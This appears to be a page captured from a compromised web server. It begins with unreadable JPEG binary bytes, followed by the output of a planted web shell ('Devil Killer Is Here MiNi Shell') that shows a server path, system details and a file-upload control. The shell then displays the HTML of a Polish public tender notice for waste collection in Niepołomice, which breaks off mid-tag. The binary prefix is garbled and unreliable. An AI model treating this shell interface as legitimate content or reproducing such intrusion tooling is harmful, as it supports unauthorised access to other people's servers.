JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241011/0054324801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie stałych odpadów powstałych na obiektach spółki w wyniku prowadzenia działalności Infrastruktury Niepołomice sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Infrastruktura Niepołomice Spółka z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 121018294</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Droga Królewska 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Niepołomice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">28 12 423</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">28 12 423</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@infrastruktura.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.infrastruktura.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 2 - gospodarka wodna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie stałych odpadów powstałych na obiektach spółki w wyniku prowadzenia działalności Infrastruktury Niepołomice sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-444d4b73-2b70-4095-8b3e-7d4867ef9a5d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00543248</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl. Korzystanie z Platformy przez Wykonawcę jest bezpłatne. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://e-propublico.pl oraz uznaje go za wiążący. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie. Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego zgodnie z wymaganiami określonymi w tym zakresie przez Zamawiającego w dokumencie SWZ. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: stały dostęp do sieci Internet; posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail), komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux, zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera); włączona obsługa JavaScript oraz Cookies. Maksymalny rozmiar pojedynczego pliku przesyłanego za pośrednictwem Platformy wynosi 150 MB, przy czym nie określa się limitu liczby plików. Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych: załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami przechowywane są na serwerach Platformy w formie zaszyfrowanej, a Zamawiający otrzyma dostęp do plików dopiero po upływie terminu otwarcia ofert; oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie &#34;Data przesłania&#34;; o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.) – dalej: RODO – tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi. Administratorem Pani/Pana danych osobowych jest Infrastruktura Niepołomice Spółka z o.o.. Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego. Odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 Ustawy Pzp, a także art. 6 Ustawy z 6 września 2001 r. o dostępie do informacji publicznej. Dane osobowe Wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Zamawiający nie planuje przetwarzania danych osobowych Wykonawcy w celu innym niż cel określony powyżej. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalnoprawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Należą do nich obowiązki informacyjne z art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego oraz art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że: udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie; udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia; w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia; skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników; w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.IN.271.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia:<br/>Nazwa zamówienia: Odbiór, transport, zagospodarowanie stałych odpadów powstałych na obiektach spółki w wyniku prowadzenia działalności Infrastruktury Niepołomice sp. z o.o.<br/><br/>Opis przedmiotu zamówienia: <br/><br/>1.	Przedmiotem zamówienia jest świadczenie usług w zakresie odbioru, transportu i zagospodarowania stałych odpadów powstałych na obiektach spółki w wyniku prowadzenia działalności Infrastruktury Niepołomice sp. z o.o. zgodnie z wymaganiami określonymi przez Zamawiającego w SWZ.<br/>2.	Zamawiający zleca Wykonawcy odbiór, transport, zagospodarowanie odpadów typu:<br/>1)	Niesegregowane (zmieszane) odpady komunalne - odpady o kodzie 20 03 01<br/>2)	Opakowania z papieru i tektury - odpady o kodzie 15 01 01<br/>3)	Opakowania ze szkła - odpady o kodzie 15 01 07<br/>4)	Opakowania z metali - odpady o kodzie 15 01 04<br/>5)	Opakowania z tworzyw sztucznych - odpady o kodzie 15 01 02<br/>6)	Odpady ulegające biodegradacji - odpady o kodzie 20 02 01<br/>7)	Odpady z czyszczenia ulic i placów - odpady o kodzie 20 03 03<br/>8)	Odpady wielkogabarytowe - odpady o kodzie 20 03 07<br/>9)	Odpady z targowisk - odpady o kodzie 20 03 02<br/>począwszy od dnia podpisania umowy, przy czym przez odpady podlegające wywozowi rozumie się odpady wyszczególnione w Rozporządzeniu Ministra Klimatu z dnia 2 stycznia 2020 r. w sprawie katalogu odpadów (Dz. U. 2020 poz. 10).<br/>3.	Zamówienie nie obejmuje odpadów niebezpiecznych wyszczególnionych w w/w rozporządzeniu.<br/>4.	Wykonawca dostarczy Zamawiającemu we własnym zakresie najpóźniej w następnym dniu od podpisania umowy, do wskazanych w ust. 5 lokalizacji, szczegółowo określonych w załączniku nr 1 do SWZ (szczegółowy opis przedmiotu zamówienia) :<br/>1) odpowiednio oznaczone pojemniki, kontenery dla niżej wymienionych odpadów::<br/>a)	na niesegregowane (zmieszane) odpady komunalne: pojemnik typu 1,1 m3 szt. 4<br/>b)	na niesegregowane (zmieszane) odpady komunalne: pojemnik typu 0,24 m3 szt. 7;<br/>c)	na niesegregowane (zmieszane) odpady komunalne: pojemnik typu 0,12 m3 szt. 2;<br/>d)	na odpady ulegające biodegradacji: kontener 8 m3 szt. 1;<br/>e)	na odpady z czyszczenia ulic i placów: kontener 6 m3 szt. 1;<br/>f)	na odpady z targowisk: pojemnik typu 1,1 m3 szt. 7;<br/>g)	na odpady segregowane pojemnik w kolorze niebieskim oznaczony napisem ,,Papier&#39;&#39; z przeznaczeniem do zbierania papieru - pojemnik typu 0,12 m3 szt. 1;<br/>h)	na odpady segregowane pojemnik w kolorze żółtym oznaczony napisem ,,Metale i tworzywa sztuczne&#39;&#39; z przeznaczeniem do zbierania metali i tworzyw sztucznych - pojemnik typu 0,12 m3 szt. 1;<br/>i)	na odpady segregowane pojemnik w kolorze zielonym oznaczony napisem ,,Szkło&#39;&#39; z przeznaczeniem do zbierania szkła - pojemnik typu 0,12 m3 szt. 1;<br/><br/>2)	odpowiednio oznaczone worki foliowe do selektywnej zbiórki odpadów poszczególnych frakcji i każdorazowo na wymianę:<br/><br/>a)	niebieski o pojemności 120 l oznaczony napisem ,,Papier&#39;&#39; z przeznaczeniem do zbierania papieru;<br/>b)	żółty o pojemności 120 l oznaczony napisem ,,Metale i tworzywa sztuczne&#39;&#39; z przeznaczeniem do zbierania metali i tworzyw sztucznych;<br/>c)	zielony o pojemności 90 l oznaczony napisem ,,Szkło&#39;&#39; z przeznaczeniem do zbierania szkła;<br/>d)	brązowy o pojemności 90 l oznaczony napisem ,,Bio&#39;&#39; z przeznaczeniem do zbierania bioodpadów.<br/>5.	Odbiory z następujących lokalizacji z terenu Gminy Niepołomice:<br/>1)	Budynek Administracyjny - ul. Droga Królewska 27 , 32 -005 Niepołomice <br/>2)	Zakład Uzdatniania Wody - Wola Batorska 1197, 32-007 Wola Batorska<br/>3)	Zakład Uzdatniania Wody - Podłęże , 32-003 Podłęże<br/>4)	Oczyszczalnia Ścieków - ul. Lutosławskiego 4, 32-005 Niepołomice<br/>5)	Oczyszczalnia Ścieków -ul. Cmentarna, 32-007 Zabierzów Bocheński 541<br/>6)	Oczyszczalnia Ścieków - Wola Zabierzowska ul. Topolowa, 32 -007 Zabierzów Bocheński<br/>7)	Oczyszczalnia Ścieków - Podłęże 671, 32-003 Podłęże<br/>8)	Kryta Pływalnia -ul. Korczaka 5, 32 -005 Niepołomice<br/>9)	Dział Usług Komunalnych, ul. Targowa 6c 32-005 Niepołomice<br/>10)	Dział Usług Komunalnych ul. Mokra , 32 -005 Niepołomice<br/><br/>6.	Wykonawca dostarczy harmonogram odbioru odpadów w terminie do 5 dni przed rozpoczęciem realizacji usługi, po jego uzgodnieniu z Zamawiającym.<br/>7.	Wykonawca winien posiadać wszelkie przewidziane prawem zezwolenia/pozwolenia na odbiór odpadów, transport i zagospodarowanie w tym w szczególności:<br/>1) zawartą umowę na przyjmowanie odebranych od właścicieli nieruchomości odpadów komunalnych z instalacją komunalną/instalacją odzysku i unieszkodliwiania odpadów zapewniających przetworzenie odpadów komunalnych zgodnie z hierarchią sposobów postępowania z odpadami i zasadą bliskości, o których mowa w ustawie z dnia 14 grudnia 2012 r. o odpadach t.j. Dz. U. z 2023 r. poz. 1587 w zakresie niezbędnym do realizacji zamówienia, w szczególności co do wszystkich rodzajów (kodów) odpadów objętych przedmiotem zamówienia. Wykonawca obowiązany jest do spełnienia ww. wymagań również przez cały okres realizacji zamówienia,<br/>2)	aktualny wpis do rejestru działalności regulowanej prowadzonego przez Burmistrza Miasta i Gminy Niepołomice zgodnie z przepisami art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2023 r. poz. 1469), w zakresie niezbędnym do realizacji zamówienia, w szczególności co do wszystkich rodzajów (kodów) odpadów objętych przedmiotem zamówienia. Wykonawca obowiązany jest do spełnienia ww. wymagań również przez cały okres realizacji zamówienia,<br/>3)	spełniać wymagania z Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagania w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122),<br/>4)	posiadać wpis do (BDO) bazy danych o produktach o opakowaniach oraz o gospodarce odpadami, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach, w zakresie transportu odpadów w zakresie niezbędnym do realizacji zamówienia, w szczególności co do wszystkich rodzajów (kodów) odpadów objętych przedmiotem zamówienia. Wykonawca obowiązany jest do spełnienia ww. wymagań również przez cały okres realizacji zamówienia,<br/>8.	Wykonawca zapewni, że ilości odpadów określone w decyzjach/zezwoleniach, które uprawniają Wykonawcę do realizacji zamówienia w zestawieniu z umowami zawartymi z innymi kontrahentami umożliwią pełną realizację niniejszej umowy w wymaganym terminie.<br/>9.	Wykonawca zapewni spełnienie wszystkich wymagań prawem wymaganych dotyczących odbioru odpadów, transportu i ich zagospodarowania.<br/>10.	Wykonawca winien że posiadać potencjał techniczny i osobowy niezbędny do wykonania zamówienia.<br/>11.	Wykonawca winien posiadać wymaganą liczbę oraz rodzaj środków transportu do realizacji przedmiotu umowy, a pojazdy wyposażone są w moduły GPS, wideorejestratory umożliwiające śledzenie tras przejazdu i ich pracy.<br/>12.	Wykonawca z chwilą przejęcia odpadów od Zamawiającego staje się ich następnym posiadaczem i zgodnie z art. 27 ust. 3 Ustawy z dnia 14 grudnia 2012 r. o odpadach ( Dz.U.2023.0.1587 t.j.) przejmuje odpowiedzialność za dalsze gospodarowanie tymi odpadami zgodnie z obowiązującymi przepisami.<br/><br/><br/>Miejsce wykonywania zamówienia: gmina Niepołomice<br/><br/>Wymóg zatrudnienia na podstawie stosunku pracy: <br/>1. Zamawiający, zgodnie z przepisem art. 95 ust. 1 ustawy Pzp, wymaga aby wykonywanie czynności w warunkach określonych w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy - na rzecz wykonawcy lub podwykonawcy, w miejscu i czasie wskazanym przez wykonawcę lub podwykonawcę - przez osoby wykonujące czynności wchodzące w tzw. koszty bezpośrednie odbywała się na podstawie stosunku pracy. Wymóg ten dotyczy osób, które wykonują czynności bezpośrednio związane z wykonywaniem usług objętych przedmiotem zamówienia, w tym. pracowników fizycznych, a w szczególności dotyczy on:<br/>1) kierowców<br/>2) operatorów instalacji zagospodarowania/przetwarzania odpadów, pracowników sprawujących nadzór nad realizacją umowy (w tym przedstawiciel wykonawcy, o którym mowa w umowie),<br/>3) pracowników odpowiedzialnych za ewidencję odpadów. <br/>Uprawnienia Zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań, o których mowa w art. 95 ust. 1 ustawy Pzp określone są w projekcie umowy ( załącznik nr 2 do SWZ)<br/><br/>Zamawiający przed złożeniem oferty zaleca przeprowadzenie wizji w terenie (przy czym wizja nie jest obowiązkowa).<br/><br/>Zamawiający nie dopuszcza składania ofert wariantowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90510000-5 - Usuwanie i obróbka odpadów</p> <p class="mb-0">90511000-2 - Usługi wywozu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający ma prawo do zwiększenia kwoty wynagrodzenia o nie więcej niż 30%, jak też ma prawo do przedłużenia okresu realizacji umowy o nie więcej niż 6 miesięcy (prawo opcji). Skorzystanie z prawa opcji (zwiększenia maksymalnej kwoty wynagrodzenia określonej w projekcie umowy lub przedłużenie okresu obowiązywania umowy) następuje poprzez złożenie pisemnego oświadczenia Wykonawcy. Zamawiający może skorzystać z opcji w całości lub w części. W przypadku skorzystania z opcji w części, Zamawiający może złożyć kolejne oświadczenie o skorzystaniu z prawa opcji, dotyczące niewykorzystanej części opcji. Skorzystanie z prawa opcji nie może nastąpić po rozwiązaniu umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 